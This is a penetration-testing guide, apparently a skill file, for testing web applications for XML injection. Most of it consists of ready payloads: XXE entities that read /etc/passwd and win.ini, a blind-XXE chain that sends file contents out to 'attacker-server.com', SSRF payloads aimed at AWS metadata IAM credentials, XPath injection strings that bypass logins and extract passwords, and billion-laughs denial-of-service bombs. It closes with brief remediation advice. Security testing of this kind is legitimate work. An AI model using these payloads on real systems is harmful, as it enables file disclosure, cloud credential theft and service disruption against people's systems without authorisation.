| name | testing-for-xml-injection-vulnerabilities |
| description | Test web applications for XML injection vulnerabilities including XXE, XPath injection, and XML entity attacks to identify data exposure and server-side request forgery risks. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | ["xml-injection","xxe","xpath-injection","xml-parsing","web-security","entity-injection","dtd-attack"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | ["PR.PS-01","ID.RA-01","PR.DS-10","DE.CM-01"] |
| mitre_attack | ["T1190","T1059.007","T1505.003","T1083","T1055"] |
Testing for XML Injection Vulnerabilities
When to Use
- When testing applications that process XML input (SOAP APIs, XML-RPC, file uploads)
- During penetration testing of applications with XML parsers
- When assessing SAML-based authentication implementations
- When testing file import/export functionality that handles XML formats
- During API security testing of SOAP or XML-based web services
Prerequisites
- Burp Suite with XML-related extensions (Content Type Converter, XXE Scanner)
- XMLLint or similar XML validation tools
- Understanding of XML structure, DTDs, and entity processing
- Python 3.x with lxml and requests libraries
- Access to an out-of-band interaction server (Burp Collaborator, interact.sh)
- Sample XXE payloads from PayloadsAllTheThings repository
Workflow
Step 1 — Identify XML Processing Endpoints
curl -s http://target.com/service?wsdl
curl -X POST http://target.com/api/data \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><root><test>hello</test></root>'
Step 2 — Test for Basic XXE (File Retrieval)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root><data>&xxe;</data></root>
Step 3 — Test for Blind XXE with Out-of-Band Detection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker-server.com/xxe.dtd">
%xxe;
]>
<root><data>test</data></root>
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker-server.com/?data=%file;'>">
%eval;
%exfil;
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://xxe-test.burpcollaborator.net">
]>
<root><data>&xxe;</data></root>
Step 4 — Test for SSRF via XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server:8080/">
]>
<root><data>&xxe;</data></root>
Step 5 — Test for XPath Injection
curl "http://target.com/search?query=' or '1'='1"
curl -X POST http://target.com/login \
-d "username=' or '1'='1&password=' or '1'='1"
curl "http://target.com/search?query=' or 1=1 or ''='"
curl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"
curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"
Step 6 — Test for XML Billion Laughs (DoS)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY a "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>
Key Concepts
| Concept | Description |
|---|
| XXE (XML External Entity) | Attack exploiting XML parsers that process external entity references |
| Blind XXE | XXE where response is not reflected; requires out-of-band channels |
| XPath Injection | Injection into XPath queries used to navigate XML documents |
| DTD (Document Type Definition) | Declarations that define XML document structure and entities |
| Parameter Entities | Special entities (%) used within DTDs for blind XXE exploitation |
| SSRF via XXE | Using XXE to make server-side requests to internal resources |
| XML Bomb | Denial of service via recursive entity expansion (Billion Laughs) |
Tools & Systems
| Tool | Purpose |
|---|
| Burp Suite | HTTP proxy with XXE Scanner extension for automated detection |
| XXEinjector | Automated XXE injection and data exfiltration tool |
| OXML_XXE | Tool for embedding XXE payloads in Office XML documents |
| xmllint | XML validation and parsing utility for payload testing |
| interact.sh | Out-of-band interaction server for blind XXE detection |
| Content Type Converter | Burp extension to convert JSON requests to XML for XXE testing |
Common Scenarios
- File Disclosure — Read sensitive server files (/etc/passwd, web.config) through classic XXE entity injection in XML input fields
- SSRF to Cloud Metadata — Access AWS/GCP/Azure metadata endpoints through XXE to steal IAM credentials and access tokens
- Blind Data Exfiltration — Extract sensitive data through out-of-band DNS/HTTP channels when XXE output is not reflected
- SAML XXE — Inject XXE payloads into SAML assertions during single sign-on authentication flows
- SVG File Upload XXE — Upload malicious SVG files containing XXE payloads to trigger server-side XML parsing
Output Format
## XML Injection Assessment Report
- **Target**: http://target.com/api/xml-endpoint
- **Vulnerability Types Found**: XXE, Blind XXE, XPath Injection
- **Severity**: Critical
### Findings
| # | Type | Endpoint | Payload | Impact |
|---|------|----------|---------|--------|
| 1 | XXE File Read | POST /api/import | SYSTEM "file:///etc/passwd" | Local File Disclosure |
| 2 | Blind XXE | POST /api/upload | External DTD with OOB | Data Exfiltration |
| 3 | SSRF via XXE | POST /api/parse | SYSTEM "http://169.254.169.254/" | Cloud Credential Theft |
### Remediation
- Disable external entity processing in XML parser configuration
- Use JSON instead of XML where possible
- Implement XML schema validation with strict DTD restrictions
- Block outbound connections from XML processing services